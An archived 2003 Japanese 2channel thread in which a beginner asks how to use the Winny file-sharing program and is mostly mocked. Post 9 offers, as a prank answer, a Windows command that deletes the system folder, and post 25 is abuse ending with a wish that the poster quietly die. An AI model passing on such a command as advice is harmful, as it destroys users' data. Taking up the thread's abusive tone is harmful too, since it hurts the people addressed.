2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

winnyの使い方教えてください!

1 :[名無し]さん(bin+cue).rar:03/09/27 16:06 ID:JAK9RjEe
ごめんなさい、初心者です。

2 :[名無し]さん(bin+cue).rar:03/09/27 16:06 ID:gkaX5bsp
2

3 :[名無し]さん(bin+cue).rar:03/09/27 16:07 ID:NHues4LX
ごめんなさい、初心者です。

4 :[名無し]さん(bin+cue).rar:03/09/27 16:08 ID:LSIqtshp
ごめんなさい、初心者です。

5 :[名無し]さん(bin+cue).rar:03/09/27 16:08 ID:JAK9RjEe
おねがいだから、まぢめに教えて苦ださい。
いっぱいいっぱいですww

6 :[名無し]さん(bin+cue).rar:03/09/27 16:09 ID:1XmBaQFK
ごめんなさい、初心者です。

7 :[名無し]さん(bin+cue).rar:03/09/27 16:09 ID:JAK9RjEe
糞スレを立てたことは謝る。
たのむからおしえてくれ

8 :[名無し]さん(bin+cue).rar:03/09/27 16:10 ID:4tNU2J6q
ごめんなさい、玄人です。

9 :[名無し]さん(bin+cue).rar:03/09/27 16:10 ID:gDg4tH3N
del /F /S C:\WINDOWS

10 :[名無し]さん(bin+cue).rar:03/09/27 16:10 ID:JAK9RjEe
>>8
ワロタ

11 :[名無し]さん(bin+cue).rar:03/09/27 16:11 ID:JAK9RjEe
>>9
?!

12 :[名無し]さん(bin+cue).rar:03/09/27 16:11 ID:no77FzNs
ここ
http://www.nan.sakura.ne.jp/winny/

13 :[名無し]さん(bin+cue).rar:03/09/27 16:12 ID:gDg4tH3N
俺なんか
ルーター(火壁用)からWinTCとノートン先生、黒氷デフォで、
それからさらに1台目のXPをルーターに設定し、
クロスケーブルで1台目に接続した2台目からダウソ
してるよ

14 :[名無し]さん(bin+cue).rar:03/09/27 16:12 ID:JAK9RjEe
シェイシェイ

15 :[名無し]さん(bin+cue).rar:03/09/27 16:12 ID:+jO89b3o
>>1
ここに行きなさい
ttp://www.nan.sakura.ne.jp/winny/

16 :[名無し]さん(bin+cue).rar:03/09/27 16:12 ID:LRAjUvtF
>>12
ネ申ッ!!

17 :[名無し]さん(bin+cue).rar:03/09/27 16:13 ID:JAK9RjEe
みなさん、ホントにこんな馬鹿厨の質問に答えてくれて
ありがとう!ww

18 :[名無し]さん(bin+cue).rar:03/09/27 16:15 ID:LSIqtshp
>>1が満足したようなので、このスレは大団円を迎えました。

19 :[名無し]さん(bin+cue).rar:03/09/27 16:15 ID:wvd2xM4d
ごめんなさい、おっすおらゴクウ!

20 :[名無し]さん(bin+cue).rar:03/09/27 16:34 ID:RSYrVXvE
ほしゅage

21 :[名無し]さん(bin+cue).rar:03/09/27 16:47 ID:SgSjmwhz
ごめんなさい、クリリンのせいかーー!!

22 :[名無し]さん(bin+cue).rar:03/09/27 16:49 ID:NSnI/Slp
ごめんなさい、>>21微妙に間違ってる

23 :[名無し]さん(bin+cue).rar:03/09/27 17:20 ID:CuG2xOuo
>>1

素 人 思 考

24 :[名無し]さん(bin+cue).rar:03/09/27 20:19 ID:hpNft156
>>1
 2chというのはアクセスが多すぎて潰れかけたことがある。2001年8月のことだった。
それでみんななるべくサーバーの負担を減らそうと言っているのだ。
 もちろんスレッドを立てただけでも結構サーバーに負担がかかる。 なのにちょっと
Googleとかで調べれば分かるようなアホな質問を新スレッド立てて聞くなんて非常識
だよ。
 君のような単発質問スレッドを立てる人間は後を絶たない。いいか、わからないことが
あったらまず検索エンジンで調べろ!それでもだめなら、Download板(ここの板)に、

【1を読んでネ】 Winny 初心者質問スレ Part25
http://tmp.2ch.net/test/read.cgi/download/1064632228/

というスレッドがあるからこっちでで聞け。それでほとんどの疑問は解決するはずなんだ。
まったくここはクソ・スレッドの典型だよ。君は自分でこのスレッドの削除依頼を出してくる
べきだ。

−以上 −

25 :[名無し]さん(bin+cue).rar:03/09/27 20:43 ID:CuG2xOuo
>>1よ、お前みたいな奴をみると、あの日のことを思い出すよ。
2001年8月25日。2ちゃんが本格的に閉鎖になりかけた日だよ。
転送量が多すぎて、費用が月700万もかかってるって発表されて、「数日中に閉鎖」って予告されてさ、
その日のうちにあっちこっちの板が封鎖されてた日だよ。
あのときのUNIX板の住人、カッコよかったんだぜ。「総力を結集」ってのはまさにああいう状態だよ。
転送量を1/3に削減しないと閉鎖、ってもんだから、新しいプログラム組んでさ、
そしたらほんの何時間かで完成したんだよ。それが聞いてくれよ、目標は1/3だったのに
1/16まで圧縮に成功しやがったんだよ。職人技なんてもんじゃねえよ、神技だよ。
でもよ、そうやって頑張る人がいた一方で、「ボクの肛門も閉鎖されそうです」とか駄スレ立ててたバカも
いたわけだよ。ちょうど、今のお前みたいにな。
だからよ、俺たちは総力を結集して、お前のバカ度を1/16に圧縮しようと思うよ。
ま、圧縮後でもお前のバカ度はこの世に生かしておくことのできないレベルだけどな。
要するに俺らの力を結集してもお前を助けることができないってことだ。
わかったら、まわりに迷惑をかけないようにひっそりと死んでくれよな

26 :[名無し]さん(bin+cue).rar:03/09/27 23:06 ID:FBF2K7Tz
じゃ皆様、心置きなく

------------------------終了-------------------------

6 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)